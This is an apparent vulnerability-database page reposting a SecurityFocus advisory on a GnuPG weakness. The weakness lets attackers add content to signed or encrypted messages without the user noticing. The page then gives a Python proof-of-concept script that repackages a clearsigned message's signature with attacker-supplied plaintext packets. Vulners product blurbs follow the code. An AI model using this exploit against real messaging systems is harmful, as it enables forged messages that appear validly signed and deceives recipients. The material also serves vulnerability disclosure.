source: https://www.securityfocus.com/bid/22757/info
GnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing.
An attacker may be able to exploit this issue in applications using GnuPG to add arbitrary content into a signed and/or encrypted message.
Exploiting this issue depends on the individual application's use of GnuPG. Individual records will be created detailing this issue in affected applications.
#!/usr/bin/python
import os, gpg, sys, base64
clear_sign = open(sys.argv[1], "rb").read().splitlines()
start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")
mid = clear_sign.index("-----BEGIN PGP SIGNATURE-----")
end = clear_sign.index("-----END PGP SIGNATURE-----")
text = '\r\n'.join(clear_sign[start+3:mid])
sign = '\n'.join(clear_sign[mid+3:end-1])
onepass = gpg.OnePassSignature()
onepass['keyid'] = (0x12341234,0x12341234)
onepass['digest_algo'] = 2
onepass['pubkey_algo'] = 1
onepass['sigclass'] = 1
plain1 = gpg.Plaintext()
plain1['name'] = 'original'
plain1['data'] = text
plain1['mode'] = 0x62
signature = gpg.Raw()
signature['data'] = base64.decodestring(sign)
compressed = gpg.Compressed()
compressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB
compressed['data'] = [onepass, plain1, signature]
pkt = gpg.Packet()
pkt['version'] = 1
pkt['data'] = compressed
os.write(1,str(pkt))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation